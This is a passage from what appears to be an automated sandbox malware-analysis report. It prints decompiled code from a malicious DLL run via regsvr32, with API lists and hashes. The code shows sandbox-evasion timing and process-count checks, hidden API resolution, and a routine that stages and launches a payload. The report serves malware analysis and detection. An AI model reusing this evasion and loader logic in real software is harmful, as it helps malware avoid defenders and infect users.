				_v104 = E6E9E2640(L"KERNEL32.dll", 0);
				_v100 = E6E9E3BB0(E6E9E5010( &_v13));
				_v108 = _v104(_v100);
				if(_v108 == 0) {
					_v14 = 0;
					_v116 = E6E9E2430(L"KERNEL32.dll", 0);
					_v112 = E6E9E3C30(E6E9E4AC0( &_v14));
					_v116(_v112);
				}
				_v15 = 0;
				_v124 = E6E9E2640(L"KERNEL32.dll", 0);
				_v120 = E6E9E3B70(E6E9E4510( &_v15));
				_v128 = _v124(_v120);
				if(_v128 == 0) {
					_v16 = 0;
					_v136 = E6E9E2430(L"Kernel32.dll", 0);
					_v132 = E6E9E3B90(E6E9E5200( &_v16));
					_v136(_v132);
				}
				return 1;
			}

0x6e9e5d9b
0x6e9e5da5
0x6e9e5daa
0x6e9e5dbc
0x6e9e5dc6
0x6e9e5dcd
0x6e9e5dd1
0x6e9e5de0
0x6e9e5df2
0x6e9e5df9
0x6e9e5df9
0x6e9e5dfe
0x6e9e5e0d
0x6e9e5e1f
0x6e9e5e29
0x6e9e5e30
0x6e9e5e34
0x6e9e5e43
0x6e9e5e55
0x6e9e5e5c
0x6e9e5e5c
0x6e9e5e61
0x6e9e5e70
0x6e9e5e82
0x6e9e5e8c
0x6e9e5e93
0x6e9e5e97
0x6e9e5ea6
0x6e9e5eb8
0x6e9e5ebf
0x6e9e5ebf
0x6e9e5ec4
0x6e9e5ed3
0x6e9e5ee5
0x6e9e5eef
0x6e9e5ef6
0x6e9e5efa
0x6e9e5f09
0x6e9e5f1b
0x6e9e5f22
0x6e9e5f22
0x6e9e5f27
0x6e9e5f36
0x6e9e5f48
0x6e9e5f52
0x6e9e5f59
0x6e9e5f5d
0x6e9e5f6c
0x6e9e5f7e
0x6e9e5f85
0x6e9e5f85
0x6e9e5f8a
0x6e9e5f99
0x6e9e5fab
0x6e9e5fb5
0x6e9e5fbc
0x6e9e5fc0
0x6e9e5fcf
0x6e9e5fe4
0x6e9e5feb
0x6e9e5feb
0x6e9e5ff6

APIs

LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5EBF
LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5F22

Strings

KERNEL32.dll, xrefs: 6E9E5DA0, 6E9E5DD6, 6E9E5E03, 6E9E5E39, 6E9E5E66, 6E9E5E9C, 6E9E5EC9, 6E9E5EFF, 6E9E5F2C, 6E9E5F62, 6E9E5F8F
Kernel32.dll, xrefs: 6E9E5FC5

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: LibraryLoad
String ID: KERNEL32.dll$Kernel32.dll
API String ID: 1029625771-1263921953
Opcode ID: 4edd07bc127837bec01181b1ab28adb51a2fd32cf83698b2af3a33ecfc523779
Instruction ID: 8105315d30b957639c3be7d2cd2125e0437ef643159d445c93c94be8bed1942e
Opcode Fuzzy Hash: 4edd07bc127837bec01181b1ab28adb51a2fd32cf83698b2af3a33ecfc523779
Instruction Fuzzy Hash: 47711C70E00218EFCF06DBF4C8587DEBBB5AF94304F104969E606AB654EFB49A418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1810 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9E1810(CHAR* _a4, CHAR* _a8, long _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t14;

				_v16 = 0x1a;
				_v8 = E6E9E8C90("ExpandEnvironmentStringsA", 0x1a, 0x1a);
				 *0x6e9fc9bc = E6E9E1490(_v8, "kernel32.dll", 0x1a, 0x1a);
				_t14 =  *0x6e9fc9bc; // 0x74e04750
				_v12 = _t14;
				return ExpandEnvironmentStringsA(_a4, _a8, _a12);
			}

0x6e9e1816
0x6e9e182b
0x6e9e1840
0x6e9e1845
0x6e9e184b
0x6e9e1860

APIs

ExpandEnvironmentStringsA.KERNEL32(?,0000001A,0000001A,00000100,kernel32.dll,0000001A,0000001A,ExpandEnvironmentStringsA,0000001A,0000001A), ref: 6E9E185A

Strings

kernel32.dll, xrefs: 6E9E1832
ExpandEnvironmentStringsA, xrefs: 6E9E1821
PGt, xrefs: 6E9E1840, 6E9E1845

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ExpandEnvironmentStringsA$PGt$kernel32.dll
API String ID: 237503144-2679594436
Opcode ID: 2395e30673c1781af88fd1928c3cdcebd7923c7507237c8b8670d879bb172f19
Instruction ID: 8ea49bcdb3b1cf1f87be29c1d25c4f75c85784af335faa08d5461b90e863c226
Opcode Fuzzy Hash: 2395e30673c1781af88fd1928c3cdcebd7923c7507237c8b8670d879bb172f19
Instruction Fuzzy Hash: 87F08C70A0620CFBCB10CFD4C801EDEB7B8BF9A701F00C549BA46AB380D6709A009F59

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E71E0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E6E9E71E0() {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				CHAR* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				struct _PROCESS_INFORMATION _v144;
				struct _STARTUPINFOA _v212;
				char _v280;
				char _v348;
				char _v1372;
				char _v2412;
				char _v3452;
				char _v4492;
				CHAR* _t121;
				void* _t140;
				char* _t141;
				CHAR* _t206;
				intOrPtr _t207;
				char* _t213;
				intOrPtr _t214;
				intOrPtr _t254;

				E6E9E9250(0x1188);
				E6E9E70A0( &_v280, 0, 0x44);
				E6E9E70A0( &_v348, 0, 0x44);
				E6E9E70A0( &_v212, 0, 0x44);
				_t206 =  *0x6e9fcaf0; // 0x6e9fcb3c
				E6E9E1810(_t206,  &_v2412, 0x410); // executed
				_t121 =  *0x6e9fcafc; // 0x6e9fcbb0
				E6E9E1810(_t121,  &_v3452, 0x410); // executed
				_v20 = E6E9E26D0(L"Kernel32.dll", 0);
				_t207 =  *0x6e9fcaec; // 0x6e9fcb50
				_v16 = _t207;
				_v20(_v16,  &_v4492, 0x410);
				_v24 = E6E9E2250(0, 0);
				_v24( &_v2412,  &_v4492);
				_v28 = E6E9E2550(0, 0);
				if(CreateDirectoryA( &_v2412, 0) == 0) {
					return 0;
				}
				_v32 = E6E9E2250(0, 0);
				_v32( &_v2412,  &_v3452);
				_v5 = 0;
				_v40 = E6E9E2250(0, 0);
				_v36 = E6E9E3910(E6E9E41B0( &_v5));
				_v40( &_v2412, _v36);
				_t213 =  *0x6e9fcaf4; // 0x6e9fcbcc
				_t140 = E6E9E8210(_t213,  &_v2412); // executed
				if(_t140 == 0) {
					_t141 =  *0x6e9fcb14; // 0x6e9fcc0c
					if(E6E9E8210(_t141,  &_v2412) == 0) {
						return 0;
					}
					_v92 = E6E9E24C0(0, 0);
					_t214 =  *0x6e9fcb08; // 0x6e9fcb68
					_v88 = _t214;
					_v92( &_v1372, _v88);
					_v96 = E6E9E2250(0, 0);
					_v96( &_v1372,  &_v3452);
					_v9 = 0;
					_v104 = E6E9E2250(0, 0);
					_v100 = E6E9E3A10(E6E9E4D00( &_v9));
					_v104( &_v1372, _v100);
					_v108 = E6E9E2250(0, 0);
					_v108( &_v1372,  &_v2412);
					_v10 = 0;
					_v116 = E6E9E2250(0, 0);
					_v112 = E6E9E38F0(E6E9E5280( &_v10));
					_v116( &_v1372, _v112);
					_v11 = 0;
					_v124 = E6E9E2370(0, 0);
					_v120 = E6E9E39D0(E6E9E3E70( &_v11));
					_push( &_v144);
					_push( &_v212);
					_push(0);
					_push(0);
					_push(0x208);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v1372);
					_push(_v120);
					if(_v124() == 0) {
						return 0;
					}
					_v128 = E6E9E2460(0, 0);
					_v128(_v144.hProcess, 0x5dc);
					E6E9E1760(_v144.hProcess);
					E6E9E1760(_v144.hThread);
					L12:
					return 1;
				}
				_v48 = E6E9E24C0(0, 0);
				_t254 =  *0x6e9fcb08; // 0x6e9fcb68
				_v44 = _t254;
				_v48( &_v1372, _v44);
				_v52 = E6E9E2250(0, 0);
				_v52( &_v1372,  &_v3452);
				_v6 = 0;
				_v60 = E6E9E2250(0, 0);
				_v56 = E6E9E3A30(E6E9E4BC0( &_v6));
				_v60( &_v1372, _v56);
				_v64 = E6E9E2250(0, 0);
				_v64( &_v1372,  &_v2412);
				_v7 = 0;
				_v72 = E6E9E2250(0, 0);
				_v68 = E6E9E38D0(E6E9E4590( &_v7));
				_v72( &_v1372, _v68);
				_v8 = 0;
				_v80 = E6E9E2370(0, 0);
				_v76 = E6E9E39F0(E6E9E5120( &_v8));
				if(CreateProcessA(_v76,  &_v1372, 0, 0, 0, 0x208, 0, 0,  &_v212,  &_v144) == 0) {
					return 0;
				}
				_v84 = E6E9E2460(0, 0);
				_v84(_v144.hProcess, 0x5dc);
				E6E9E1760(_v144.hProcess);
				E6E9E1760(_v144.hThread);
				goto L12;
			}

0x6e9e71e8
0x6e9e71f8
0x6e9e7208
0x6e9e7218
0x6e9e7229
0x6e9e7230
0x6e9e7241
0x6e9e7247
0x6e9e7258
0x6e9e725b
0x6e9e7261
0x6e9e7274
0x6e9e7280
0x6e9e7291
0x6e9e729d
0x6e9e72ae
0x00000000
0x6e9e75db
0x6e9e72bd
0x6e9e72ce
0x6e9e72d3
0x6e9e72df
0x6e9e72f1
0x6e9e72ff
0x6e9e7309
0x6e9e7310
0x6e9e7317
0x6e9e7476
0x6e9e7483
0x00000000
0x6e9e75d5
0x6e9e7492
0x6e9e7495
0x6e9e749b
0x6e9e74a9
0x6e9e74b5
0x6e9e74c6
0x6e9e74cb
0x6e9e74d7
0x6e9e74e9
0x6e9e74f7
0x6e9e7503
0x6e9e7514
0x6e9e7519
0x6e9e7525
0x6e9e7537
0x6e9e7545
0x6e9e754a
0x6e9e7556
0x6e9e7568
0x6e9e7571
0x6e9e7578
0x6e9e7579
0x6e9e757b
0x6e9e757d
0x6e9e7582
0x6e9e7584
0x6e9e7586
0x6e9e758e
0x6e9e7592
0x6e9e7598
0x00000000
0x6e9e75cf
0x6e9e75a3
0x6e9e75b2
0x6e9e75bc
0x6e9e75c8
0x6e9e75d9
0x00000000
0x6e9e75df
0x6e9e7326
0x6e9e7329
0x6e9e732f
0x6e9e733d
0x6e9e7349
0x6e9e735a
0x6e9e735f
0x6e9e736b
0x6e9e737d
0x6e9e738b
0x6e9e7397
0x6e9e73a8
0x6e9e73ad
0x6e9e73b9
0x6e9e73cb
0x6e9e73d9
0x6e9e73de
0x6e9e73ea
0x6e9e73fc
0x6e9e742c
0x00000000
0x6e9e7463
0x6e9e7437
0x6e9e7446
0x6e9e7450
0x6e9e745c
0x00000000

APIs

Part of subcall function 6E9E1810: ExpandEnvironmentStringsA.KERNEL32(?,0000001A,0000001A,00000100,kernel32.dll,0000001A,0000001A,ExpandEnvironmentStringsA,0000001A,0000001A), ref: 6E9E185A

CreateDirectoryA.KERNEL32(?,00000000,00000000,00000000,?,6E9E896F), ref: 6E9E72A9

Part of subcall function 6E9E8210: InternetCheckConnectionA.WININET(?,00000001,00000000,00000000,00000000), ref: 6E9E8231

CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000208,00000000,00000000,?,?,00000000,00000000,?,6E9E896F), ref: 6E9E7427

Strings

Kernel32.dll, xrefs: 6E9E724E

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: Create$CheckConnectionDirectoryEnvironmentExpandInternetProcessStrings
String ID: Kernel32.dll
API String ID: 254214958-1926710522
Opcode ID: d514f6cddc1dd4e24158d131a485e11c373f314781ae6bb31c41ba0571219c64
Instruction ID: 30116b13f5973c308091f9373d37eb86529e84132d452ea5bc6cb3972cf13957
Opcode Fuzzy Hash: d514f6cddc1dd4e24158d131a485e11c373f314781ae6bb31c41ba0571219c64
Instruction Fuzzy Hash: 1EC11F71A40308AADB55DBF4CC45FDEB778AF98705F108999A309BB580EFB09A44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E8A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6E9E8A90(void* __ecx, void* __eflags) {
				char _v5;
				long _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v304;
				signed char _t32;
				char _t46;
				char _t47;
				char _t48;
				intOrPtr _t49;
				char _t50;

				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				_v12 = 0;
				_v28 = 0xa;
				_t32 = E6E9E5D90(__eflags); // executed
				if((_t32 & 0x000000ff) == 0) {
					L15:
					__eflags = 0;
					return 0;
				} else {
					_v5 = 0;
					_v36 = E6E9E26D0(L"Kernel32.dll", 0);
					_v32 = E6E9E3D10(E6E9E4E80( &_v5));
					_v36(_v32,  &_v304, 0x100);
					_v20 =  *((intOrPtr*)(E6E9E2220(L"Kernel32.dll", 0)))();
					L2:
					if(_v12 < _v28) {
						_v40 = E6E9E22E0(L"Kernel32.dll", 0);
						Sleep(0x1770);
						_v44 = E6E9E2580(L"Kernel32.dll", 0);
						Beep(0, 0xbb8);
						_v12 = _v12 + 1;
						goto L2;
					}
					_v16 =  *((intOrPtr*)(E6E9E2220(L"Kernel32.dll", 0)))();
					_v24 = _v16 - _v20;
					__eflags = _v24 - 0xd6d8;
					if(_v24 < 0xd6d8) {
						goto L15;
					}
					__eflags = _v12 - _v28;
					if(__eflags < 0) {
						goto L15;
					}
					_t46 = E6E9E7700(__eflags);
					__eflags = _t46;
					if(_t46 == 0) {
						return 1;
					}
					_t47 = E6E9E69A0( &_v304); // executed
					__eflags = _t47;
					if(_t47 != 0) {
						_t48 = E6E9E7670(); // executed
						__eflags = _t48;
						if(__eflags == 0) {
							_t49 = E6E9E7770(); // executed
							_v48 = _t49;
							__eflags = _v48 - 1;
							if(_v48 == 1) {
								_t50 = E6E9E71E0(); // executed
								__eflags = _t50;
								if(__eflags == 0) {
									E6E9E6390(__eflags);
								} else {
									E6E9E6390(__eflags); // executed
								}
							}
						} else {
							E6E9E6390(__eflags);
						}
					}
					goto L15;
				}
			}

0x6e9e8a99
0x6e9e8aa0
0x6e9e8aa7
0x6e9e8aae
0x6e9e8ab5
0x6e9e8abc
0x6e9e8ac6
0x6e9e8bd9
0x6e9e8bd9
0x00000000
0x6e9e8acc
0x6e9e8ace
0x6e9e8add
0x6e9e8aef
0x6e9e8b02
0x6e9e8b13
0x6e9e8b16
0x6e9e8b1c
0x6e9e8b2a
0x6e9e8b32
0x6e9e8b41
0x6e9e8b4b
0x6e9e8b54
0x00000000
0x6e9e8b54
0x6e9e8b67
0x6e9e8b70
0x6e9e8b73
0x6e9e8b7a
0x00000000
0x00000000
0x6e9e8b7f
0x6e9e8b82
0x00000000
0x00000000
0x6e9e8b84
0x6e9e8b89
0x6e9e8b8b
0x00000000
0x6e9e8b8d
0x6e9e8b9d
0x6e9e8ba2
0x6e9e8ba4
0x6e9e8ba6
0x6e9e8bab
0x6e9e8bad
0x6e9e8bb6
0x6e9e8bbb
0x6e9e8bbe
0x6e9e8bc2
0x6e9e8bc4
0x6e9e8bc9
0x6e9e8bcb
0x6e9e8bd4
0x6e9e8bcd
0x6e9e8bcd
0x6e9e8bcd
0x6e9e8bcb
0x6e9e8baf
0x6e9e8baf
0x6e9e8baf
0x6e9e8bad
0x00000000
0x6e9e8ba4

APIs

Part of subcall function 6E9E5D90: LoadLibraryA.KERNEL32(?,KERNEL32.dll,00000000), ref: 6E9E5EBF

Sleep.KERNEL32(00001770,Kernel32.dll,00000000), ref: 6E9E8B32
Beep.KERNEL32(00000000,00000BB8,Kernel32.dll,00000000), ref: 6E9E8B4B

Strings

Kernel32.dll, xrefs: 6E9E8AD3, 6E9E8B07, 6E9E8B20, 6E9E8B37, 6E9E8B5B

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: BeepLibraryLoadSleep
String ID: Kernel32.dll
API String ID: 1352138507-1926710522
Opcode ID: d44273c21361c884031f95210e4d07be0c00bf05bbab222d1f26fe49b3d78be7
Instruction ID: 8439258208e2c259ae3c2b9a80d3380c32cb641b0ee43e44f740df168dc1d195
Opcode Fuzzy Hash: d44273c21361c884031f95210e4d07be0c00bf05bbab222d1f26fe49b3d78be7
Instruction Fuzzy Hash: 55313070D0030AEAEB56DBF498447EEB7B8AF95304F184859D711BBA80DBB5D540CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E7670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E6E9E7670() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				char _v524;
				CHAR* _t12;
				CHAR* _t21;

				_t21 =  *0x6e9fcaf0; // 0x6e9fcb3c
				E6E9E1810(_t21,  &_v268, 0x100);
				_t12 =  *0x6e9fcaec; // 0x6e9fcb50
				E6E9E1810(_t12,  &_v524, 0x100);
				_v8 = E6E9E2250(L"KERNEL32.dll", 0);
				_v8( &_v268,  &_v524);
				_v12 = E6E9E25B0(L"Shlwapi.dll", 0);
				if(PathIsDirectoryA( &_v268) == 0) {
					return 0;
				}
				return 1;
			}

0x6e9e7685
0x6e9e768c
0x6e9e769d
0x6e9e76a3
0x6e9e76b4
0x6e9e76c5
0x6e9e76d4
0x6e9e76e3
0x00000000
0x6e9e76ec
0x00000000

APIs

Part of subcall function 6E9E1810: ExpandEnvironmentStringsA.KERNEL32(?,0000001A,0000001A,00000100,kernel32.dll,0000001A,0000001A,ExpandEnvironmentStringsA,0000001A,0000001A), ref: 6E9E185A

PathIsDirectoryA.SHLWAPI(?,Shlwapi.dll,00000000), ref: 6E9E76DE

Strings

Shlwapi.dll, xrefs: 6E9E76CA
KERNEL32.dll, xrefs: 6E9E76AA

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: DirectoryEnvironmentExpandPathStrings
String ID: KERNEL32.dll$Shlwapi.dll
API String ID: 2691487551-3851112466
Opcode ID: da9b1f12d797b0474d023f9a14d9b367ed72fdf292d94fa1f72c152f30da2519
Instruction ID: f181f0f937cd879369840a8ac0b1c1c96340f61359572026c71eb2899638bee0
Opcode Fuzzy Hash: da9b1f12d797b0474d023f9a14d9b367ed72fdf292d94fa1f72c152f30da2519
Instruction Fuzzy Hash: BB018C72A04208AADB51DBE48C44FCE737C9F98700F008995A245EA580EEF0EA848FA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E17B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9E17B0(CHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = E6E9E8C90("CreateFileA", 0xc, 0xc);
				 *0x6e9fc95c = E6E9E1490(_v8, "kernel32.dll", 0xc, 0xc);
				_v12 =  *0x6e9fc95c;
				return CreateFileA(_a4, _a8, _a12, _a16, _a20, _a24, _a28);
			}

0x6e9e17c4
0x6e9e17d9
0x6e9e17e4
0x6e9e1809

APIs

CreateFileA.KERNEL32(00000080,0000000C,0000000C,?,0000000C,0000000C,?,00000000,kernel32.dll,0000000C,0000000C,CreateFileA,0000000C,0000000C,00000080,00000000), ref: 6E9E1803

Strings

kernel32.dll, xrefs: 6E9E17CB
CreateFileA, xrefs: 6E9E17BA

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: CreateFile
String ID: CreateFileA$kernel32.dll
API String ID: 823142352-3765438396
Opcode ID: 4bb49a0c23b3932aa201712ae1c58f4d67191bf57f53fd9e445ba3a92707951d
Instruction ID: 9265dd3aca191b3c6273d58c96ab201d2c7a213a1ff57f4fc532b0bba5d8deb3
Opcode Fuzzy Hash: 4bb49a0c23b3932aa201712ae1c58f4d67191bf57f53fd9e445ba3a92707951d
Instruction Fuzzy Hash: B5F0FF76604209FBDB04DFD8D841E9F7BB8AF8D700F008648BA05AB340D630E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E7770 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E6E9E7770() {
				intOrPtr _v8;
				unsigned int _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v4116;

				E6E9E9250(0x1010);
				_v8 = E6E9E25E0(0, 0);
				_v8( &_v4116, 0x400,  &_v12);
				_v16 = _v12 >> 2;
				if(_v16 < 0x32) {
					_v20 = E6E9E2670(L"Kernel32.dll", 0);
					_v20(0xfffffffe);
				}
				return 1;
			}

0x6e9e7778
0x6e9e7786
0x6e9e7799
0x6e9e77a2
0x6e9e77a9
0x6e9e77b7
0x6e9e77bc
0x6e9e77bc
0x6e9e77c7

APIs

K32EnumProcesses.KERNEL32(?,00000400,?,00000000,00000000,?,6E9E8961), ref: 6E9E7799

Strings

Kernel32.dll, xrefs: 6E9E77AD
2, xrefs: 6E9E77A5

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: EnumProcesses
String ID: 2$Kernel32.dll
API String ID: 84517404-3787872808
Opcode ID: 307dd3771b2bc9ffd8c582f2cd8606f8768713ee00a0884dd706457e29c67dd9
Instruction ID: 444d5e2200e3608dc0ea853bba24dfad38ee524fffccc57b2198be467aef525d
Opcode Fuzzy Hash: 307dd3771b2bc9ffd8c582f2cd8606f8768713ee00a0884dd706457e29c67dd9
Instruction Fuzzy Hash: E3F01271940309BBDB10DBD48C01BEDB778FF80704F104695EA557A6C4DBB59A40DF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1910 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9E1910(void* _a4, long _a8, long _a12, long _a16) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = E6E9E8C90("VirtualAlloc", 0xd, 0xd);
				 *0x6e9fc964 = E6E9E1490(_v8, "kernel32.dll", 0xd, 0xd);
				_v12 =  *0x6e9fc964;
				return VirtualAlloc(_a4, _a8, _a12, _a16);
			}

0x6e9e1924
0x6e9e1939
0x6e9e1944
0x6e9e195d

APIs

VirtualAlloc.KERNEL32(00003000,0000000D,0000000D,?,00000004,kernel32.dll,0000000D,0000000D,VirtualAlloc,0000000D,0000000D,00003000,00000004), ref: 6E9E1957

Strings

kernel32.dll, xrefs: 6E9E192B
VirtualAlloc, xrefs: 6E9E191A

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc$kernel32.dll
API String ID: 4275171209-2067260499
Opcode ID: 836196b25f638451bb8b04535fa805b37f255e3b2dc1589c5511e6df946634ad
Instruction ID: d048c4423ad911ae6386c17ea8ecb13d931d3c411fe28384be937f4e02d55156
Opcode Fuzzy Hash: 836196b25f638451bb8b04535fa805b37f255e3b2dc1589c5511e6df946634ad
Instruction Fuzzy Hash: 61F03075A45308BBCB10DFD8ED41FAE77B8AF89B04F008649BA05AB380D670D910DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1960 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6E9E1960(void* _a4, long _a8, long _a12) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = E6E9E8C90("VirtualFree", 0xc, 0xc);
				 *0x6e9fc968 = E6E9E1490(_v8, "kernel32.dll", 0xc, 0xc);
				_v12 =  *0x6e9fc968;
				return VirtualFree(_a4, _a8, _a12);
			}

0x6e9e1974
0x6e9e1989
0x6e9e1994
0x6e9e19a9

APIs

